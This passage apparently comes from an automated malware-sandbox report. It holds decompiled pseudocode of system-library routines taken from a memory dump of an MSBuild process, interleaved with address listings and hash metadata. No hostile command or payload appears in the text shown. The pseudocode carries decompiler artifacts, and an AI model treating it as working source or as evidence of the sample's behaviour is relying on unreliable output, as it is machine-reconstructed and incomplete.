						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                                                0x010a52a5
                                                                                                0x010a52ad
                                                                                                0x010a52b0
                                                                                                0x010a52b3
                                                                                                0x010a52b7
                                                                                                0x010a52ba
                                                                                                0x010a52bf
                                                                                                0x010a52c4
                                                                                                0x010a52cc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010a52ce
                                                                                                0x010a52d9
                                                                                                0x010a52dd
                                                                                                0x010a52e7
                                                                                                0x010a52f7
                                                                                                0x010a52f9
                                                                                                0x010a52fd
                                                                                                0x01100dcf
                                                                                                0x01100dd5
                                                                                                0x01100dd6
                                                                                                0x01100dd7
                                                                                                0x01100dd8
                                                                                                0x01100dd9
                                                                                                0x01100dde
                                                                                                0x01100ddf
                                                                                                0x01100de0
                                                                                                0x01100de1
                                                                                                0x01100de2
                                                                                                0x01100de5
                                                                                                0x01100dea
                                                                                                0x01100dec
                                                                                                0x01100f60
                                                                                                0x01100f64
                                                                                                0x01100f70
                                                                                                0x01100f76
                                                                                                0x01100f79
                                                                                                0x01100f79
                                                                                                0x00000000
                                                                                                0x01100f64
                                                                                                0x01100df2
                                                                                                0x01100df7
                                                                                                0x01100e04
                                                                                                0x01100e0d
                                                                                                0x01100e0d
                                                                                                0x01100e10
                                                                                                0x01100e1a
                                                                                                0x01100e1c
                                                                                                0x01100e4c
                                                                                                0x01100e52
                                                                                                0x01100e61
                                                                                                0x01100e67
                                                                                                0x01100e6b
                                                                                                0x01100e70
                                                                                                0x01100e76
                                                                                                0x01100ed7
                                                                                                0x01100edc
                                                                                                0x01100ee0
                                                                                                0x01100ee6
                                                                                                0x01100eea
                                                                                                0x01100eed
                                                                                                0x01100ef0
                                                                                                0x01100ef3
                                                                                                0x01100ef6
                                                                                                0x01100ef9
                                                                                                0x01100efe
                                                                                                0x01100f01
                                                                                                0x01100f01
                                                                                                0x01100f0b
                                                                                                0x01100f12
                                                                                                0x01100f16
                                                                                                0x01100f18
                                                                                                0x01100f1b
                                                                                                0x01100f2c
                                                                                                0x01100f31
                                                                                                0x01100f31
                                                                                                0x01100f35
                                                                                                0x01100f39
                                                                                                0x01100f3a
                                                                                                0x01100f3c
                                                                                                0x01100f3f
                                                                                                0x01100f50
                                                                                                0x01100f55
                                                                                                0x01100f55
                                                                                                0x01100f59
                                                                                                0x010a52eb
                                                                                                0x010a52f1
                                                                                                0x010a52f1
                                                                                                0x01100e7d
                                                                                                0x01100e84
                                                                                                0x01100e88
                                                                                                0x01100e8a
                                                                                                0x01100e8d
                                                                                                0x01100e9e
                                                                                                0x01100ea3
                                                                                                0x01100ea3
                                                                                                0x01100ea7
                                                                                                0x01100eaf
                                                                                                0x01100eb3
                                                                                                0x01100eb9
                                                                                                0x01100eb9
                                                                                                0x01100ebc
                                                                                                0x01100ecd
                                                                                                0x01100ecd
                                                                                                0x00000000
                                                                                                0x01100eb3
                                                                                                0x01100e21
                                                                                                0x01100e2b
                                                                                                0x01100e2f
                                                                                                0x01100e30
                                                                                                0x01100e3a
                                                                                                0x01100e3f
                                                                                                0x01100e41
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01100e47
                                                                                                0x00000000
                                                                                                0x01100e47
                                                                                                0x01100df9
                                                                                                0x01100dfe
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01100dfe
                                                                                                0x010a5303
                                                                                                0x010a5307
                                                                                                0x00000000
                                                                                                0x010a5309
                                                                                                0x00000000
                                                                                                0x010a5309
                                                                                                0x010a5307
                                                                                                0x010a52e9
                                                                                                0x010a52e9
                                                                                                0x00000000
                                                                                                0x010a52e9
                                                                                                0x010a530e
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d130da4d4da9856166c7411253a2c0b4f5f3269311fd1d4f4528f3c49997e7b8
                                                                                                • Instruction ID: 675dbde6c12d7eac504375e7224a4f112a2a7004d9e759146f213ce031aa19ad
                                                                                                • Opcode Fuzzy Hash: d130da4d4da9856166c7411253a2c0b4f5f3269311fd1d4f4528f3c49997e7b8
                                                                                                • Instruction Fuzzy Hash: 9F51BD711053429BD726EF68C845BABBBE4FF94710F14091EF4E587691E7B0E844CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D2AE4 Relevance: .2, Instructions: 159COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010D2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1198204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1198208; // 0x1198207
				_t8 = _t57 + 0x1198208; // 0x1198207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1198450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x119821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1196d5c; // 0xff070654
							_t72 =  *0x1196d5c; // 0xff070654
							_t75 =  *0x1196d5c; // 0xff070654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1196d5c; // 0xff070654
							_t84 =  *0x1196d5c; // 0xff070654
							_t87 =  *0x1196d5c; // 0xff070654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E010EF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                                                0x010d2ae4
                                                                                                0x010d2aec
                                                                                                0x010d2aef
                                                                                                0x010d2af4
                                                                                                0x010d2af7
                                                                                                0x010d2afd
                                                                                                0x010d2b92
                                                                                                0x010d2b92
                                                                                                0x010d2b97
                                                                                                0x010d2b9c
                                                                                                0x010d2b9c
                                                                                                0x010d2b03
                                                                                                0x010d2b06
                                                                                                0x010d2b09
                                                                                                0x010d2b09
                                                                                                0x010d2b0f
                                                                                                0x010d2b15
                                                                                                0x010d2b15
                                                                                                0x010d2b1b
                                                                                                0x010d2b1e
                                                                                                0x010d2b21
                                                                                                0x010d2b26
                                                                                                0x010d2b29
                                                                                                0x010d2b81
                                                                                                0x010d2b84
                                                                                                0x010d2c0e
                                                                                                0x010d2c15
                                                                                                0x010d2c24
                                                                                                0x010d2c24
                                                                                                0x010d2b8a
                                                                                                0x010d2b8a
                                                                                                0x010d2b8a
                                                                                                0x010d2b8a
                                                                                                0x010d2b90
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d2b4a
                                                                                                0x010d2b4a
                                                                                                0x010d2b4d
                                                                                                0x010d2b53
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d2b55
                                                                                                0x010d2b58
                                                                                                0x010d2bb7
                                                                                                0x01115d1b
                                                                                                0x01115d37
                                                                                                0x01115d47
                                                                                                0x01115d53
                                                                                                0x010d2bbd
                                                                                                0x010d2bbd
                                                                                                0x010d2bbd
                                                                                                0x010d2bb7
                                                                                                0x010d2b5d
                                                                                                0x010d2c2f
                                                                                                0x01115d5b
                                                                                                0x01115d77
                                                                                                0x01115d87
                                                                                                0x01115d93
                                                                                                0x010d2c35
                                                                                                0x010d2c35
                                                                                                0x010d2c35
                                                                                                0x010d2c2f
                                                                                                0x010d2b65
                                                                                                0x010d2b9f
                                                                                                0x010d2ba2
                                                                                                0x010d2b67
                                                                                                0x010d2b67
                                                                                                0x010d2b69
                                                                                                0x010d2b6b
                                                                                                0x010d2b6e
                                                                                                0x010d2bc9
                                                                                                0x010d2bcc
                                                                                                0x010d2bcf
                                                                                                0x010d2bd4
                                                                                                0x010d2bd6
                                                                                                0x010d2bd6
                                                                                                0x010d2bdb
                                                                                                0x010d2c02
                                                                                                0x010d2c05
                                                                                                0x010d2c07
                                                                                                0x00000000
                                                                                                0x010d2c07
                                                                                                0x010d2be0
                                                                                                0x010d2c00
                                                                                                0x010d2c3f
                                                                                                0x010d2c3f
                                                                                                0x00000000
                                                                                                0x010d2c00
                                                                                                0x010d2be5
                                                                                                0x010d2be7
                                                                                                0x010d2bec
                                                                                                0x010d2bf4
                                                                                                0x010d2bf6
                                                                                                0x00000000
                                                                                                0x010d2bf6
                                                                                                0x010d2b70
                                                                                                0x010d2b76
                                                                                                0x010d2b2b
                                                                                                0x010d2b2b
                                                                                                0x010d2b2d
                                                                                                0x010d2b2f
                                                                                                0x010d2b32
                                                                                                0x010d2b35
                                                                                                0x010d2b3a
                                                                                                0x00000000
                                                                                                0x010d2b40
                                                                                                0x010d2b43
                                                                                                0x010d2b45
                                                                                                0x010d2b47
                                                                                                0x010d2b4a
                                                                                                0x010d2b4d
                                                                                                0x010d2b53
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d2b53
                                                                                                0x010d2b78
                                                                                                0x010d2b78
                                                                                                0x010d2b7b
                                                                                                0x010d2b7e
                                                                                                0x00000000
                                                                                                0x010d2b7e
                                                                                                0x010d2b76
                                                                                                0x010d2ba5
                                                                                                0x010d2ba5
                                                                                                0x010d2ba8
                                                                                                0x010d2bad
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d2baf
                                                                                                0x010d2baf
                                                                                                0x010d2bc2
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e15d027a1dc4ed50e3d285d327d8f11367369976f068adb3ed1d204c487e520d
                                                                                                • Instruction ID: c595572dce1262124aea18db61db32f24ee52b2174a88889a244716ad273bb49
                                                                                                • Opcode Fuzzy Hash: e15d027a1dc4ed50e3d285d327d8f11367369976f068adb3ed1d204c487e520d
                                                                                                • Instruction Fuzzy Hash: 93519376A00215CFCB18CF1CC8909BDB7F1FB88710719856AE8A69B355D774AE91CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0116AE44 Relevance: .2, Instructions: 152COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 86%
                                                                                                			E0116AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0116C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0116ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0116FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0116EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E010C7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01161608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E01171536(0x1198ae4, (_t74 -  *0x1198b04 >> 0x14) + (_t74 -  *0x1198b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0116C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0116A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0114CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0116ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                                                                0x0116ae44
                                                                                                0x0116ae4c
                                                                                                0x0116ae53
                                                                                                0x0116ae55
                                                                                                0x0116ae5c
                                                                                                0x0116ae64
                                                                                                0x0116ae68
                                                                                                0x0116ae75
                                                                                                0x0116ae75
                                                                                                0x0116ae78
                                                                                                0x0116ae7a
                                                                                                0x0116ae7c
                                                                                                0x0116ae7f
                                                                                                0x0116aea8
                                                                                                0x0116aeab
                                                                                                0x0116aead
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0116aeb3
                                                                                                0x0116aeb8
                                                                                                0x0116aebb
                                                                                                0x0116aebd
                                                                                                0x00000000
                                                                                                0x0116ae81
                                                                                                0x0116ae88
                                                                                                0x0116ae8f
                                                                                                0x0116ae9b
                                                                                                0x0116ae96
                                                                                                0x0116ae96
                                                                                                0x0116ae96
                                                                                                0x0116aea0
                                                                                                0x0116aea3
                                                                                                0x0116aebf
                                                                                                0x0116aebf
                                                                                                0x0116aec3
                                                                                                0x0116aec9
                                                                                                0x0116af0d
                                                                                                0x0116af14
                                                                                                0x0116af3d
                                                                                                0x0116af3d
                                                                                                0x0116af41
                                                                                                0x0116af44
                                                                                                0x0116af67
                                                                                                0x0116af67
                                                                                                0x0116af6a
                                                                                                0x0116afca
                                                                                                0x0116afd1
                                                                                                0x00000000
                                                                                                0x0116afd1
                                                                                                0x0116af6c
                                                                                                0x0116af6d
                                                                                                0x0116af75
                                                                                                0x0116af7c
                                                                                                0x0116af7e
                                                                                                0x0116af80
                                                                                                0x0116af85
                                                                                                0x0116af87
                                                                                                0x0116af99
                                                                                                0x0116af89
                                                                                                0x0116af92
                                                                                                0x0116af92
                                                                                                0x0116af9e
                                                                                                0x0116afa1
                                                                                                0x0116afa3
                                                                                                0x0116afa9
                                                                                                0x0116afb0
                                                                                                0x0116afb2
                                                                                                0x0116afb4
                                                                                                0x0116afbc
                                                                                                0x0116afbc
                                                                                                0x0116afb4
                                                                                                0x0116afb0
                                                                                                0x00000000
                                                                                                0x0116afa1
                                                                                                0x0116af4f
                                                                                                0x0116af57
                                                                                                0x0116af5c
                                                                                                0x0116af5e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0116af60
                                                                                                0x0116af64
                                                                                                0x0116af64
                                                                                                0x00000000
                                                                                                0x0116af64
                                                                                                0x0116af1a
                                                                                                0x0116af25
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0116af27
                                                                                                0x0116af28
                                                                                                0x0116af33
                                                                                                0x00000000
                                                                                                0x0116aed0
                                                                                                0x0116aed0
                                                                                                0x0116aed2
                                                                                                0x0116aee1
                                                                                                0x0116aee4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0116aee6
                                                                                                0x0116aeec
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0116aefb
                                                                                                0x0116af07
                                                                                                0x0116afd3
                                                                                                0x0116afdb
                                                                                                0x0116afdb
                                                                                                0x00000000
                                                                                                0x0116af07
                                                                                                0x0116aed6
                                                                                                0x0116aed8
                                                                                                0x0116aedf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0116aedf
                                                                                                0x0116aec9

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f0caf023fd37e0a5b3bce67990f030a623d50b54d07e171a2f52bdd473837e60
                                                                                                • Instruction ID: df3b4e8deae4b2ec1e2ff2047869501cb8cfb509a2d9c0762f7af729053e1e4d
                                                                                                • Opcode Fuzzy Hash: f0caf023fd37e0a5b3bce67990f030a623d50b54d07e171a2f52bdd473837e60
                                                                                                • Instruction Fuzzy Hash: 0A4106B17002115BD72EDA2DE894B3FBBDDAF84614F044258F926A72D0DB36D821C793
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010CDBE9 Relevance: .1, Instructions: 149COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 86%
                                                                                                			E010CDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E010ACC50(E010A4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E010C7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E01178ED6(_t102, _t98);
						}
						_t76 = _v44;
						E010C2280(_t58, _v44);
						E010CDD82(_v44, _t102, _t98);
						E010CB944(_t102, _v5);
						return E010BFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1198628; // 0x0
							_v28 = _t67;
							_t68 =  *0x119862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1198628; // 0x0
						_t105 = _v28;
						_t80 =  *0x119862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x116fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                                                                0x010cdbe9
                                                                                                0x010cdbf2
                                                                                                0x010cdbf7
                                                                                                0x010cdbf9
                                                                                                0x010cdbfc
                                                                                                0x010cdc00
                                                                                                0x010cdc03
                                                                                                0x010cdc14
                                                                                                0x010cdd54
                                                                                                0x010cdd54
                                                                                                0x010cdd54
                                                                                                0x010cdc18
                                                                                                0x010cdc1d
                                                                                                0x010cdc1d
                                                                                                0x010cdc32
                                                                                                0x010cdc3b
                                                                                                0x010cdc3e
                                                                                                0x010cdc46
                                                                                                0x010cdd5b
                                                                                                0x010cdd62
                                                                                                0x010cdd64
                                                                                                0x010cdd67
                                                                                                0x010cdd69
                                                                                                0x010cdd6b
                                                                                                0x010cdd6e
                                                                                                0x010cdd70
                                                                                                0x010cdd73
                                                                                                0x010cdd73
                                                                                                0x00000000
                                                                                                0x010cdc4c
                                                                                                0x010cdc4e
                                                                                                0x01113ae3
                                                                                                0x01113ae8
                                                                                                0x01113aea
                                                                                                0x010cdce7
                                                                                                0x010cdce9
                                                                                                0x010cdcec
                                                                                                0x010cdcee
                                                                                                0x010cdcf0
                                                                                                0x010cdcf3
                                                                                                0x010cdcf5
                                                                                                0x01113af2
                                                                                                0x01113af5
                                                                                                0x01113af5
                                                                                                0x010cdd06
                                                                                                0x010cdd08
                                                                                                0x010cdd0b
                                                                                                0x010cdd12
                                                                                                0x01113b08
                                                                                                0x010cdd18
                                                                                                0x010cdd18
                                                                                                0x010cdd18
                                                                                                0x010cdd20
                                                                                                0x010cdd23
                                                                                                0x01113b16
                                                                                                0x01113b16
                                                                                                0x010cdd29
                                                                                                0x010cdd2d
                                                                                                0x010cdd36
                                                                                                0x010cdd40
                                                                                                0x010cdd51
                                                                                                0x010cdd51
                                                                                                0x010cdc54
                                                                                                0x010cdc59
                                                                                                0x010cdc59
                                                                                                0x010cdc5e
                                                                                                0x010cdc5e
                                                                                                0x010cdc63
                                                                                                0x010cdc66
                                                                                                0x010cdc6b
                                                                                                0x010cdc78
                                                                                                0x010cdc7b
                                                                                                0x010cdc81
                                                                                                0x010cdc81
                                                                                                0x010cdc83
                                                                                                0x010cdc89
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010cdd7b
                                                                                                0x010cdd7b
                                                                                                0x010cdc8f
                                                                                                0x010cdc8f
                                                                                                0x010cdc92
                                                                                                0x010cdc99
                                                                                                0x010cdc9f
                                                                                                0x010cdca5
                                                                                                0x010cdcaa
                                                                                                0x010cdcaa
                                                                                                0x010cdcb3
                                                                                                0x010cdcb8
                                                                                                0x010cdcbb
                                                                                                0x010cdcc1
                                                                                                0x010cdccf
                                                                                                0x010cdcd2
                                                                                                0x010cdcd5
                                                                                                0x010cdcd7
